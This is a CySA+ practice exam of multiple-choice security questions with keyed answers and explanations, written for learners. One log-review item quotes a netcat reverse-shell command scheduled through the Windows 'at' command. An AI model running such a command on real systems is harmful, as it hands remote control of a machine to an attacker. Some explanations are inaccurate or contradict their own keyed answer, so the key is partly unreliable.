Mock Test : CompTIA CySA+ (CS0-001)

What provides a standard nomenclature for describing security-related software flaws?

Options are :

  • CVE (Correct)
  • SOX
  • Patch
  • Vulnerability

Answer : CVE

Explanation Common Vulnerabilities and Exposures (CVE) is an element of the Security Content Automation Protocol (SCAP) that provides a standard nomenclature for describing security flaws.

Which of the protocols listed is not likely to be a trigger for a vulnerability scan alert when it’s used to support a virtual private network (VPN)?

Options are :

  • IPSec (Correct)
  • SSLv2
  • PPTP
  • SSLv3

Answer : IPSec

Explanation IPSec is a secure protocol that works with VPNs. The use of SSL and PPTP is discouraged for VPN security.

A cyber security analyst works at a college that wants to increase the security of its network by implementing vulnerability scans of centrally-managed workstations, student laptops, and faculty laptops. This solution must be able to scale up or down as new students and faculty use the network. Additionally, the college wants to minimize the number of false positives and ensure a high accuracy of the results. The solution must also be centrally-managed through an enterprise console. What scanning topology would be BEST to meet these requirements?

Options are :

  • Passive scanning engine located at the core of the network infrastructure
  • Combination of cloud-based and server-based scanning engines
  • Combination of server-based and agent-based scanning engines
  • Active scanning engine installed on the enterprise console (Correct)

Answer : Active scanning engine installed on the enterprise console

Explanation Since the college wants to ensure there is a centrally-managed enterprise console, using an active scanning engine installed on the enterprise console would best meet these requirements. Then, the college’s cyber security analysts could perform scans on any devices that are connected to the network using the active scanning engine at the desired intervals.

Which one of the listed approaches gives the most current and accurate information about the vulnerabilities present in a system because of an operating system that has misconfigured settings?

Options are :

  • On-demand vulnerability scanning
  • Continuous vulnerability scanning
  • Scheduled vulnerability scanning
  • Agent-based monitoring (Correct)

Answer : Agent-based monitoring

Explanation Of these listed approaches, vulnerability scans can only give you a snapshot of a system's status at a certain time. Agent-based monitoring provides many more details of the configuration and provides an internal perspective.

Marsha noticed that a management interface for a virtualization platform was exposed to a scanner when performing a vulnerability scan of her data center. In normal circumstances, what would the proper exposure for this interface be?

Options are :

  • Internet
  • Internal networks
  • No exposure
  • Management network (Correct)

Answer : Management network

Explanation The best practice for this particular situation would be to expose the management interface to an isolated/dedicated network that only authorized engineers are able to see. This would also help reduce the likelihood of an attack against the host/platform.

What is an insecure protocol that should not be used?

Options are :

  • Telnet (Correct)
  • SSH
  • SFTP
  • HTTPS

Answer : Telnet

Explanation Telnet uses cleartext transmission of authentication credentials and should be replaced with the secure shell (SSH) protocol.

Greg is worried about the theft of sensitive information that’s stored in a database. Which of the following vulnerabilities poses a direct threat to this information?

Options are :

  • SQL injection (Correct)
  • Cross-site scripting
  • Buffer overflow
  • Denial of service

Answer : SQL injection

Explanation While a buffer overflow attack could have a negative impact on information stored in a database, an SQL injection could pose a more direct and more impactful threat. The SQL injection could allow the attacker to execute remote commands on the database server. Cross-site scripting attacks are typically user-based threats. A denial of service (DoS) attack targets availability rather than information disclosure.

Neil ran a port scan on a network device. Which of the following ports listed (open) represents the most significant possible security vulnerability?

Options are :

  • 22
  • 23 (Correct)
  • 161
  • 443

Answer : 23

Explanation The best answer is port 23. Port 23 is used by Telnet and is not secure/encrypted. Neil should ensure that Telnet is disabled and blocked as well. SSH runs on port 22, port 161 is SNMP, and port 443 is HTTPS for secure web connections.

Which of the following is the most difficult to confirm with an external vulnerability scan?

Options are :

  • Cross-site scripting (XSS)
  • Cross-site request forgery (XSRF/CSRF)
  • Blind SQL injection (Correct)
  • Unpatched web server

Answer : Blind SQL injection

Explanation XSS and CSRF/XSRF are typically easier to detect because the scanner can pick up information that proves a successful attack. Unpatched servers can usually be identified by the banner information, and scanners typically cannot confirm blind SQL injections with execution of code.

Edward's IDS reports that ports 1 to 1024 received SYN packets from a remote host. What has likely happened to cause this traffic?

Options are :

  • Remote host cannot find the right service port
  • SYN flood
  • Port scan (Correct)
  • UDP probe

Answer : Port scan

Explanation A SYN scan may connect to each possible open port on a remote system, triggering an IDS. While scanners support more stealthy scans, default scans may connect to each port in turn. Remote hosts will typically connect to only a single port associated with a service. A SYN flood normally sends many SYNs to a single system but doesn’t send them to unused ports, and a UDP probe will not send SYN packets.

A company has an open investigation and hires you as a cyber security analyst to assist with the investigation. When you arrive, you begin by reviewing some security logs. During the log review, you notice the following snippet of code: 

sc config schedule start auto
net start schedule
at 10:42 "c:\temp\nc.exe 172.16.34.12 443 -e cmd.exe"

What BEST describes the situation and recommendations you should make to remedy this situation?

Options are :

  • The host (172.16.34.12) is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory; You recommend removing the host from the network. (Correct)
  • The host (172.16.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not currently a threat.
  • The host (172.16.34.12) is beaconing every day at 10:42 by running nc.exe from the temp directory; You recommend removing the host from the network.
  • The host (172.16.34.12) is a rogue device on the network; You recommend removing the host from the network.

Answer : The host (172.16.34.12) is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory; You recommend removing the host from the network.

Explanation The code snippet is setting up a Windows Task Scheduler task (at). This command (nc.exe) will run at the specified time (10:42) each day. This is the netcat program, and it is being run from the c:\temp directory to set up a reverse shell (-e cmd.exe) to the host (172.16.34.12 on port 443).

Which of the following are related to patents, copyrights, trademarks, and trade secrets?

Options are :

  • PII
  • PHI
  • Corporate confidential
  • Intellectual property (Correct)

Answer : Intellectual property

Explanation Patents, copyrights, and trademarks are all considered to be intellectual property. Trade secrets are considered proprietary and are not protected by governments.

Bob needs to verify that the workstations he is responsible for have received a particular critical Windows patch. Which method should be used to avoid validating patch status for all Windows 10 systems?

Options are :

  • Check the Update History manually
  • Run the Microsoft Baseline Security Analyzer (Correct)
  • Create and run a PowerShell script to search for the specific patch in question
  • Use SCCM to validate patch status for each machine on the domain

Answer : Run the Microsoft Baseline Security Analyzer

Explanation The best answer is MBSA (Microsoft baseline security analyzer). This program is now outdated and shouldn’t be used to support Windows 10. (MBSA v2.3 still works with Windows 10, but it is being phased out.)

Jamie has been tasked with finding a rogue network device on her wired network. What option is NOT likely to help identify the rogue device?

Options are :

  • MAC validation
  • Port scanning
  • Site surveys
  • War-walking (Correct)

Answer : War-walking

Explanation Checking valid MAC addresses against a known list, scanning for new systems or devices, and physically surveying for unexpected systems can all be helpful. War-walking (surveying for wireless networks and devices) won’t help find a wired rogue device.

Certain permissions are set on a directory structure on a Windows system that Tony is currently investigating. Which Sysinternals tool will provide him with this information?

Options are :

  • DiskView
  • AccessEnum (Correct)
  • du
  • AccessChk

Answer : AccessEnum

Explanation The Sysinternals suite provides two tools used for checking access: AccessEnum and AccessChk. AccessEnum is a GUI program that gives you a full view of the filesystem as well as registry settings and can display their permissions. AccessChk is a command line program that can check the rights a user or group has access to. Therefore, the best choice here is AccessEnum.

Jonathan’s team completed the first phase of their incident response process. They’re currently assessing the time to recover from the incident. Using the NIST recoverability effort categories, the team has decided that they can predict the time to recover but this requires additional resources. How should he categorize this using the NIST model?

Options are :

  • Regular
  • Supplemented (Correct)
  • Extended
  • Not recoverable

Answer : Supplemented

Explanation The key to remembering the NIST recoverability categories is that each level adds unknowns and resources, increasing the severity level from regular to supplemented and then to extended. Nonrecoverable situations exist when whatever happened cannot be remediated, and an investigation is then launched. In a nongovernment agency, this phase COULD include notifying law enforcement. The best option for this is supplemented.

What is NOT a means of improving data validation and trust?

Options are :

  • Encrypting data in transit
  • Using MD5 checksums for files
  • Decrypting data at rest (Correct)
  • Implementing Tripwire

Answer : Decrypting data at rest

Explanation Encrypting data, hashing files using MD5 to check against known valid checksums, and implementing a file integrity monitor are all methods of improving data validation and trust. Decrypting data at rest does not improve your ability to trust it!

Rhett is currently tracing activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long strings of text and then began using the sudo command to carry out actions. What type of attack has just taken place?

Options are :

  • Privilege escalation (Correct)
  • Phishing
  • Social engineering
  • Session hijacking

Answer : Privilege escalation

Explanation The best answer is privilege escalation. The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. The other options are possible ways for an attacker to obtain information, but there is no evidence that shows these happened.

Ellen is asked for a code that is sent to her via text (SMS) message during her login process. What concerns should she raise to the manager of her organization’s AAA services?

Options are :

  • SMS should be encrypted to be secure.
  • SMS messages may be accessible to attackers via VoIP or other systems. (Correct)
  • SMS should be paired with a third factor.
  • SMS is secure, and she should not raise a concern.

Answer : SMS messages may be accessible to attackers via VoIP or other systems.

Explanation NIST’s SP 800-63-3 recommends that SMS messages be deprecated as a means of delivering a second factor for multifactor authentication because they may be accessible to attackers. SMS is unable to be encrypted (at least without adding additional applications to phones), and a third factor is typically not a user-friendly recommendation.

Stewart is responsible for conducting periodic reviews of the information security policy for his organization, of which he is the CISO. The policy was drafted three years ago and has had a few revisions after some audits and assessments have taken place. Which of the following is the most reasonable frequency to conduct formal reviews?

Options are :

  • Monthly
  • Quarterly
  • Annually (Correct)
  • Every five years

Answer : Annually

Explanation The best option is annual reviews. Annual reviews are an industry standard and are typically sufficient unless circumstances happen which force an update/revision sooner. Waiting five years doesn’t make any sense at all and monthly/quarterly may be too soon for substantial changes.

A software assurance laboratory is performing a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. In what phase of the SDLC does fuzzing occur?

Options are :

  • Planning phase
  • Requirements phase
  • Prototyping phase (Correct)
  • Static code analysis

Answer : Prototyping phase

Explanation During the prototyping phase, security testers can implement fuzzing techniques to find vulnerabilities by conducting a dynamic assessment on a given application.

Of the following connection status messages, which one indicates an active connection between two systems?

Options are :

  • ESTABLISHED (Correct)
  • LISTENING
  • LAST_ACK
  • CLOSE_WAIT

Answer : ESTABLISHED

Explanation The best option is the ESTABLISHED message. This indicates that a connection is active between two systems. LISTENING is waiting for a connection, while LAST_ACK and CLOSE_WAIT are messages that appear when closing a connection.

You have been hired as a consultant to help a company, Blueboard Enterprises, develop a new disaster recovery plan. Blueboard has recently grown in the number of employees, and so has its information systems infrastructure to support those new employees. Unfortunately, Blueboard doesn’t currently have any documentation, policies, or procedures for its network. What is the first step you should recommend to Blueboard’s management in order to help in the development of the disaster recovery plan?

Options are :

  • Conduct a risk assessment
  • Develop a data retention policy
  • Execute vulnerability scanning
  • Identify assets (Correct)

Answer : Identify assets

Explanation The first step to developing an effective disaster recovery plan is to understand exactly what assets your organization has. This requires the identification of assets. Once identified, you can then determine what assets and services are essential to business operations and how best to recover in the event of a disaster.

What type of controls are firewalls, intrusion detection systems, and RADIUS examples of?

Options are :

  • Administrative controls
  • Technical controls (Correct)
  • Physical controls
  • Compensating controls

Answer : Technical controls

Explanation Firewalls, intrusion detection systems, and RADIUS are all examples of technical controls. Administrative controls involve processes and procedures, and physical controls include locks, fences, and other controls over physical access. Compensating controls are controls that are put in place to cover for gaps in other controls.

Which protocol is paired with OAuth2 to provide authentication services in a federated identity management solution on the Web?

Options are :

  • Kerberos
  • ADFS
  • SAML
  • OpenID (Correct)

Answer : OpenID

Explanation The best option is OpenID. Pairing OAuth with OpenID is a common approach to provide a complete solution.

Joe and Mary work together to review Joe’s code with Mary explaining the code he wrote as he reviews it. What code review technique are Joe and Mary using?

Options are :

  • Pair programming
  • Dual control
  • Over-the-shoulder (Correct)
  • Tool assisted review

Answer : Over-the-shoulder

Explanation Over-the-shoulder code reviews rely on a programmer explaining their code to a peer, providing a chance for review and better understanding for both coders. Pair programming alternates between programmers, with one strategizing and reviewing it while the other writes code. Dual control is a personnel security process, and tool-assisted reviews are conducted using a software tool.

Which of the following is not normally part of an endpoint security suite?

Options are :

  • IPS
  • Firewall
  • Antimalware
  • VPN (Correct)

Answer : VPN

Explanation VPN is the best answer. Endpoint security includes host firewalls, IPS, and antimalware software.

Lisa is working with a development team on including security best practices in the SDLC. She frequently consults the Center for Internet Security’s system design recommendations. Which of the following control categories would contain information helpful for her?

Options are :

  • Inventory of authorized/unauthorized devices
  • Controlled use of administrative privileges
  • Application software security (Correct)
  • Malware defenses

Answer : Application software security

Explanation The best option is application software security. While all the other categories contain helpful information, the application software security control is the one most likely to contain relevant information relating to the SDLC.

Nate has been tasked with choosing a firewall to protect his organization’s internal infrastructure to help protect his organization from network-based attacks. Which of the following is not an option that would meet his requirements?

Options are :

  • Cisco NGFW
  • HP TippingPoint (Correct)
  • CheckPoint appliance
  • Palo Alto NGFW

Answer : HP TippingPoint

Explanation TippingPoint is an IPS which notifies of intrusions to a network. The other options are all firewall solutions.

Of the following vulnerability scanning tools, which option is limited to collecting information from specific operating systems only?

Options are :

  • Nikto
  • OpenVAS
  • MBSA (Correct)
  • Qualys

Answer : MBSA

Explanation The MBSA system works only with Windows operating systems (hence the name, Microsoft Baseline Security Analyzer). The other products run on multiple systems.

If there is an expected loss of ______ or more, then the federal government classifies the economic impact of a security incident as high.

Options are :

  • $1
  • $10,000
  • $100,000
  • $500,000 (Correct)

Answer : $500,000

Explanation The federal government uses the threshold of $500,000 to distinguish high-impact breaches. Medium-impact breaches are between $10,000 and $500,000. Low-impact breaches are between $1 and $10,000.

Alissa doesn’t want to run a program installed by a user that she believes is set with a RunOnce key in the registry but she needs to boot the system. What can she do to prevent the RunOnce from executing the programs listed in the registry key?

Options are :

  • Disable the registry at boot
  • Boot with Safe Mode (Correct)
  • Boot with the –RunOnce flag
  • RunOnce cannot be disabled; she will need to boot from external media to disable it first.

Answer : Boot with Safe Mode

Explanation When booting in Safe Mode, Run and RunOnce are ignored by the Windows system. The best answer choice is to boot with Safe Mode.

Tanner needs to sanitize hard drives from several leased workstations that are being returned to the supplier at the end of the lease period. The drives contained information that his organization classifies as sensitive data that some companies would find valuable if they could obtain it. Which is the most appropriate choice to ensure that data exposure doesn’t occur during this process?

Options are :

  • Clear, validate, and document
  • Purge the drives
  • Purge, validate, and document (Correct)
  • The drives must be destroyed to ensure no data loss

Answer : Purge, validate, and document

Explanation One thing to note is that these were leased drives that are being returned at the end of a lease. The contract, surely, does not allow the drives to be destroyed so purging the drives, validating what’s been purged, and documenting the entire project is the best response. Clearing them leaves a possibility that some tools would allow data recovery.

You are a cyber security analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is TRUE? 

BEGIN OUTPUT
———————---------

# nmap win2k12.local

Nmap scan report for win2k12 (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports 
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http 

# nc win2k12.local 80

220 win2k12.local BeverageCorp SMTP Server (Postfix/2.4.1) 

# nc win2k12.local 22

SSH-2.0-OpenSSH_7.2 Debian-2

#

———————---------
END OUTPUT

Options are :

  • Your email server is running on a non-standard port (Correct)
  • Your email server has been compromised
  • Your organization has a vulnerable version of the SSH server software installed
  • Your web server has been compromised

Answer : Your email server is running on a non-standard port

Explanation As shown in the output of the nmap scans, only two standard ports are being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner that is provided shows the SMTP server is running on port 80. SMTP is normally run on port 25 by default, so running it on port 80 means your email server (SMTP) is running on a non-standard port.

You have been asked by the Security Operations Center Manager to look over a recent network utilization report because he fears that something may be wrong. The report is as follows:


IP Address      Server Name    Server Uptime       Historical    Current
192.168.20.2    web01          7D 12H 32M 06S      42.6 GB       44.1 GB
192.168.20.3    webdev02       4D 07H 12M 45S      1.95 GB       2.13 GB
192.168.20.4    dbsvr01        12D 02H 46M 14S     3.15 GB       24.6 GB
192.168.20.5    marketing01    2D 17H 18M 41S      5.2 GB        4.9 GB

Based on the report provided, what server do you think your cyber security analysts need to investigate further?

Options are :

  • web01
  • webdev02
  • dbsvr01 (Correct)
  • marketing01

Answer : dbsvr01

Explanation You should consider investigating the dbsvr01 due to the very large increase in network utilization. The server has a historical average utilization of only 3.15 GB per month, but this month there has been an increase to 24.6 GB of usage. This is indicative of a possible data breach and data exfiltration.

You are a cyber security analyst and have been asked to review the following packet of information: 

23:12:23.154234 IP 172.18.10.3:25 > 192.168.10.45:3389 Flags [P.], Seq 1834:1245, ack1, win 511, options [nop,nop, TS val 263451334 erc 482862734, length 125

After looking over the information on the packet, you discovered there is an unauthorized service running on the host. What ACL should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on that host?

Options are :

  • DENY TCP ANY HOST 192.168.10.45 EQ 3389 (Correct)
  • DENY IP HOST 192.168.10.45 ANY EQ 25
  • DENY IP HOST 172.18.10.3 HOST 192.168.10.45 EQ 3389
  • DENY TCP ANY HOST 172.18.10.3 EQ 25

Answer : DENY TCP ANY HOST 192.168.10.45 EQ 3389

Explanation Since the question asks you to prevent access to the unauthorized service, we need to block port 3389 from accepting connections on 192.168.10.45 (the host). This option will deny ANY workstation from connecting to this machine (host) over port 3389 (the Remote Desktop Protocol service, which is unauthorized).

Your company has recently been the victim of a large scale data breach. The hackers were able to exfiltrate the personal information and social security numbers of your customers during their attack. The Chief Executive Officer has notified law enforcement about the breach and they will be assisting with the investigation into the cause and to help collect evidence to attempt to put the hackers into prison. What actions should you take in response to this event?

Options are :

  • You should provide training to all your employees about the proper incident communication channels to use during a security event
  • You should ask all employees to commit to an NDA about the data breach verbally
  • You should block all employee access to social media from the company’s network
  • You should ask a member of law enforcement to meet with your employees (Correct)

Answer : You should ask a member of law enforcement to meet with your employees

Explanation Since the data breach is the subject of an active law enforcement investigation, you should request that a representative of the law enforcement agency speak with your employees to give them clear guidance on what they can and cannot say to people outside of the investigation.

An incident responder is reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data in memory. What type of threat did the incident responder MOST likely uncover?

Options are :

  • Rootkit
  • Key logger
  • Ransomware
  • POS malware (Correct)

Answer : POS malware

Explanation POS malware focuses on retail terminals like cash registers and other Point of Sale systems.

A penetration tester would seek to gain complete control of a system during what phase of a penetration test?

Options are :

  • Planning
  • Attack (Correct)
  • Reporting
  • Discovery

Answer : Attack

Explanation During the attack phase, the attacker seeks to gain access to a system, escalate that access to obtain complete control, and then conduct browsing to identify mechanisms to gain access to additional systems.

Which of the following is NOT one of the main criteria that should be included in a penetration testing plan?

Options are :

  • Timing
  • Scope
  • Account credentials (Correct)
  • Authorization

Answer : Account credentials

Explanation The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization.

A cybersecurity analyst has received an alert that well-known “call home” messages are continuously observed by network sensors at the network boundary. The good news is that the proxy firewall was properly configured to successfully drop the messages prior to them leaving the network. These “call home” messages have been determined to be a true positive. What is MOST likely the cause?

Options are :

  • Attackers are running reconnaissance on company resources
  • An infected system is running a command that is attempting to reach a botnet's command and control server (Correct)
  • A malicious insider is trying to exfiltrate information to a remote network
  • Malware is running on a company workstation or server

Answer : An infected system is running a command that is attempting to reach a botnet's command and control server

Explanation The “call home” message is indicative of beaconing. This usually occurs after a stage 1 malware has been implanted on a company’s workstation or server, but the more correct answer is that this infected system is running a command that is attempting to reach a botnet’s command and control server. This beaconing will continue until the infected host (workstation or server) is found and cleared of the malware, or until the botnet gives the infected host further instructions (such as to attack).

Cybersecurity risks result from the combination of a threat and a(n) _____________.

Options are :

  • Malicious Actor
  • Risk
  • Vulnerability (Correct)
  • Exploit

Answer : Vulnerability

Explanation Cybersecurity risks result from the combination of a threat and a vulnerability. A vulnerability is a weakness in a device, system, application, or process that might allow an attack to take place. A threat in the world of cybersecurity is an outside force that may exploit a vulnerability.

If your DNS server allows __________ and is not properly secured, attackers may be able to get a full listing of your internal DNS information.

Options are :

  • Zone transfers (Correct)
  • Split horizon
  • FQDN resolution
  • Remediate the threat

Answer : Zone transfers

Explanation DNS zone transfers provide a full listing of DNS information. Improperly secured DNS servers may allow attackers to gather this data by performing a zone transfer.

Amy is under the impression that attackers were able to extract a VSC (volume shadow copy) from a workstation on her organization’s domain, which belonged to a domain administrator. What information should not be reported as being potentially exposed?

Options are :

  • All files on users’ desktops
  • Password hashes
  • Domain details
  • Plain-text Windows account passwords (Correct)

Answer : Plain-text Windows account passwords

Explanation The best option is plain-text Windows account passwords, since Windows hashes all passwords it stores and so does not keep them in plain text. She should report all users’ files, password hashes, and domain details as possibly being exposed.

Ryan was asked to implement network controls to ensure that users who authenticate are physically in the building of the network they’re authenticating to. What technology and tool should be used for this?

Options are :

  • Geo-IP and port security
  • GPS location and NAC (Correct)
  • GPS location and port-security
  • Geo-IP and NAC

Answer : GPS location and NAC

Explanation GPS location and Network Access Control is the best option. Network Access Control is used to identify an endpoint with network authentication and the GPS location will provide the longitude and latitude of the user.

TRUE or FALSE: Networks are made more secure through the use of network access control, firewalls, and segmentation.

Options are :

  • TRUE (Correct)
  • FALSE

Answer : TRUE

Explanation Networks are made more secure through the use of network access control, firewalls, and segmentation. Network access control (NAC) solutions help security professionals achieve two cybersecurity objectives: limiting network access to authorized individuals and ensuring that systems accessing the organization’s network meet basic security requirements. Network firewalls sit at the boundaries between networks and provide perimeter security. Network segmentation uses isolation to separate networks of differing security levels from each other.

Johnny wants to make sure he receives logs for his Cisco devices that indicate when they shut down due to failure. What log level should Johnny configure on his devices in order to receive these types of messages?

Options are :

  • 0 (Correct)
  • 2
  • 5
  • 7

Answer : 0

Explanation Cisco log levels range from 0 for emergencies to 7 for debugging.

Tara’s company is making significant investments in infrastructure-as-a-service (IaaS) hosting to replace its data centers. Members of the company have expressed concerns about data remanence when the team moves from one virtual host to another in their cloud service environment. What should the team be instructed to do to avoid this concern?

Options are :

  • Zero-wipe drives before moving systems
  • Use full-disk encryption (Correct)
  • Use data masking
  • Span multiple virtual disks to fragment data

Answer : Use full-disk encryption

Explanation The best option out of the ones listed would be to use full disk encryption. This method will ensure that all data is encrypted and cannot be exposed to users whether physical or virtual. Using a zero wipe is typically impossible because VM systems may move without user intervention; data masking will not prevent temporary data from being exposed and spanning multiple disks will leave the data accessible, even though it’ll be fragmented.
